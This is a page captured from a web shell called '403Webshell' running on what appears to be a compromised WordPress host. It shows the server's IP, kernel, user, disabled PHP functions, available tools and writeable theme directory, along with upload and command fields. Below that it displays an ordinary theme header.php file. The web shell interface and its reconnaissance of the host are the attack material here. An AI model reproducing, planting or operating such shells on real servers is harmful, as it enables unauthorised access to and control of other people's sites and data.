403Webshell
Server IP : 152.53.162.115  /  Your IP : 216.73.217.85
Web Server : Apache/2
System : Linux host 6.12.0-55.40.1.el10_0.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Oct 21 05:54:51 EDT 2025 x86_64
User : pbshosting ( 1005)
PHP Version : 8.3.30
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/pbshosting/domains/arunoommen.com/public_html/wp-content/themes/Theme21/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/pbshosting/domains/arunoommen.com/public_html/wp-content/themes/Theme21//header.php
<?php
/**
 * The Header for our theme
 *
 * Displays all of the <head> section and everything up till <div id="main">
 *
 * @package WordPress
 * @subpackage Twenty_Fourteen
 * @since Twenty Fourteen 1.0
 */
?><!DOCTYPE html>
<!--[if IE 7]>
<html class="ie ie7" <?php language_attributes(); ?>>
<![endif]-->
<!--[if IE 8]>
<html class="ie ie8" <?php language_attributes(); ?>>
<![endif]-->
<!--[if !(IE 7) & !(IE 8)]><!-->
<html <?php language_attributes(); ?>>
<!--<![endif]-->
<head>
	<meta charset="<?php bloginfo( 'charset' ); ?>">
	<meta name="viewport" content="width=device-width">
	<title><?php wp_title( '|', true, 'right' ); ?></title>
	<link type="image/x-icon" rel="shortcut icon" href="<?php echo get_template_directory_uri(); ?>/images/fav-icon/favicon.ico">
	
	<link rel="apple-touch-icon" sizes="57x57" href="<?php echo get_template_directory_uri(); ?>/images/fav-icon/apple-icon-57x57.png">
	<link rel="apple-touch-icon" sizes="60x60" href="<?php echo get_template_directory_uri(); ?>/images/fav-icon/apple-icon-60x60.png">
	<link rel="apple-touch-icon" sizes="72x72" href="<?php echo get_template_directory_uri(); ?>/images/fav-icon/apple-icon-72x72.png">
	<link rel="apple-touch-icon" sizes="76x76" href="<?php echo get_template_directory_uri(); ?>/images/fav-icon/apple-icon-76x76.png">
	<link rel="apple-touch-icon" sizes="114x114" href="<?php echo get_template_directory_uri(); ?>/images/fav-icon/apple-icon-114x114.png">
	<link rel="apple-touch-icon" sizes="120x120" href="<?php echo get_template_directory_uri(); ?>/images/fav-icon/apple-icon-120x120.png">
	<link rel="apple-touch-icon" sizes="144x144" href="<?php echo get_template_directory_uri(); ?>/images/fav-icon/apple-icon-144x144.png">
	<link rel="apple-touch-icon" sizes="152x152" href="<?php echo get_template_directory_uri(); ?>/images/fav-icon/apple-icon-152x152.png">
	<link rel="apple-touch-icon" sizes="180x180" href="<?php echo get_template_directory_uri(); ?>/images/fav-icon/apple-icon-180x180.png">
	<link rel="icon" type="image/png" sizes="192x192"  href="<?php echo get_template_directory_uri(); ?>/images/fav-icon/android-icon-192x192.png">
	<link rel="icon" type="image/png" sizes="32x32" href="<?php echo get_template_directory_uri(); ?>/images/fav-icon/favicon-32x32.png">
	<link rel="icon" type="image/png" sizes="96x96" href="<?php echo get_template_directory_uri(); ?>/images/fav-icon/favicon-96x96.png">
	<link rel="icon" type="image/png" sizes="16x16" href="<?php echo get_template_directory_uri(); ?>/images/fav-icon/favicon-16x16.png">
	<link rel="manifest" href="<?php echo get_template_directory_uri(); ?>/images/fav-icon/manifest.json">
	<meta name="msapplication-TileColor" content="#ffffff">
	<meta name="msapplication-TileImage" content="<?php echo get_template_directory_uri(); ?>/images/fav-icon/ms-icon-144x144.png">
	<meta name="theme-color" content="#ffffff">
	<link rel="profile" href="http://gmpg.org/xfn/11">
	<link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>">
	
	<link href="https://fonts.googleapis.com/css?family=Abel|Open+Sans:300,400,700|Oswald:300,400,700" rel="stylesheet"> 
    <link href="<?php echo get_template_directory_uri(); ?>/css/bootstrap.min.css" rel="stylesheet">
	<link href="<?php echo get_template_directory_uri(); ?>/css/font-awesome.min.css" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/OwlCarousel2/2.2.0/assets/owl.carousel.min.css" />
	
    <link href="<?php echo get_template_directory_uri(); ?>/css/style.css" rel="stylesheet">
	<link rel='stylesheet' id='yt-scase-com-allview-css-css'  href='<?php echo site_url(); ?>/wp-content/plugins/youtube-showcase//assets/css/allview.css?ver=4.6.1' type='text/css' media='all' />
	<!--[if lt IE 9]>
	<script src="<?php echo get_template_directory_uri(); ?>/js/html5.js"></script>
	<![endif]-->
	<?php $day = date("l"); ?>
    	<?php 
			if ($day == "Monday") { echo '<style>.mon{color:#E65A75 !important;font-weight: bold !important;}</style>'; } 
			if ($day == "Tuesday") { echo '<style>.tue{color:#E65A75 !important;font-weight: bold !important;}</style>'; } 
			if ($day == "Wednesday") { echo '<style>.wed{color:#E65A75 !important;font-weight: bold !important;}</style>'; } 
			if ($day == "Thursday") { echo '<style>.thu{color:#E65A75 !important;font-weight: bold !important;}</style>'; } 
			if ($day == "Friday") { echo '<style>.fri{color:#E65A75 !important;font-weight: bold !important;}</style>'; } 
			if ($day == "Saturday") { echo '<style>.sat{color:#E65A75 !important;font-weight: bold !important;}</style>'; } 
			if ($day == "Sunday") { echo '<style>.sun{color:#E65A75 !important;font-weight: bold !important;}</style>'; } 
		?>
	
	<?php wp_head(); ?>
</head>

<body <?php body_class(); ?>>

<header>
      <div class="top-header">
        <div class="container">
          <div class="row">
            <div class="col-md-6 col-sm-7 hidden-sm hidden-xs">
              <div class="row">
              <div class="col-md-6 col-sm-6">
                <div class="top-left">
                <i class="fa fa-map-marker" aria-hidden="true"></i><?php echo get_option('location'); ?>
               </div><!-- top-left -->
              </div><!-- col-md-3 -->
              <div class="col-md-6 col-sm-6">
                 <div class="top-right">
              <ul>
                <li><a href="<?php echo get_option('facebook_url'); ?>" target="_blank"><i class="fa fa-facebook" aria-hidden="true"></i></a></li>
                <li><a href="<?php echo get_option('twitter_url'); ?>" target="_blank"><i class="fa fa-twitter" aria-hidden="true"></i></a></li>
                <li><a href="<?php echo get_option('google_url'); ?>" target="_blank"><i class="fa fa-google-plus" aria-hidden="true"></i></a></li>
                <li><a href="<?php echo get_option('youtube_url'); ?>" target="_blank"><i class="fa fa-youtube" aria-hidden="true"></i></a></li>
                </div><!-- top-right -->
              </div><!-- col-md-3 -->
              </div><!-- row -->
            </div><!-- col-md-6 -->
            <div class="col-md-6 col-sm-5 hidden-sm hidden-xs">
              <div class="row">
              <div class="col-md-6 col-sm-6">
                <div class="top-head-right">
                  <i class="fa fa-envelope-o" aria-hidden="true"></i><?php echo get_option('email'); ?>
                </div><!-- top-head-right -->
              </div><!-- col-md-6 -->
              <div class="col-md-6 col-sm-6">
                <div class="top-head-right">
                <i class="fa fa-phone" aria-hidden="true"></i><?php echo get_option('phone'); ?>
                </div><!-- top-head-right -->
              </div><!-- col-md-6 -->
             </div><!-- row -->
            </div><!-- col-md-6 -->

             <div class="col-sm-12 visible-sm visible-xs">
                 <div class="top-right">
              <ul>
                <li><a href="<?php echo get_option('facebook_url'); ?>" target="_blank"><i class="fa fa-facebook" aria-hidden="true"></i></a></li>
                <li><a href="<?php echo get_option('twitter_url'); ?>" target="_blank"><i class="fa fa-twitter" aria-hidden="true"></i></a></li>
                <li><a href="<?php echo get_option('google_url'); ?>" target="_blank"><i class="fa fa-google-plus" aria-hidden="true"></i></a></li>
                <li><a href="<?php echo get_option('youtube_url'); ?>" target="_blank"><i class="fa fa-youtube" aria-hidden="true"></i></a></li>
                <li><a href="mailto:<?php echo get_option('email'); ?>"><i class="fa fa-envelope" aria-hidden="true"></i></a></li>
                <li><a href="tel:<?php echo get_option('phone'); ?>"><i class="fa fa-phone" aria-hidden="true"></i></a></li>
                </div><!-- top-right -->
              </div><!-- col-md-3 -->

          </div><!-- row -->
        </div><!-- container -->
      </div><!-- top-header -->
      <div class="nav-container">
    <nav class="navbar navbar-default">
  <div class="container">
    <!-- Brand and toggle get grouped for better mobile display -->
    <div class="navbar-header">
      <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
      <a class="navbar-brand" href="<?php echo site_url('/'); ?>"><?php dynamic_sidebar('logo'); ?> </a>
    </div>

    <!-- Collect the nav links, forms, and other content for toggling -->
    <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
		<?php $defaults = array(
					'theme_location'  => 'primary',
					'container'       => '',    
					'items_wrap'      => '<ul class="nav navbar-nav navbar-right menu" id="%1$s" >%3$s</ul>',    
				);
		 wp_nav_menu( $defaults ); ?> 
      
    </div><!-- /.navbar-collapse -->
  </div><!-- /.container-fluid -->
</nav>
</div><!-- nav-container -->
    </header>

Youez - 2016 - github.com/yon3zu
LinuXploit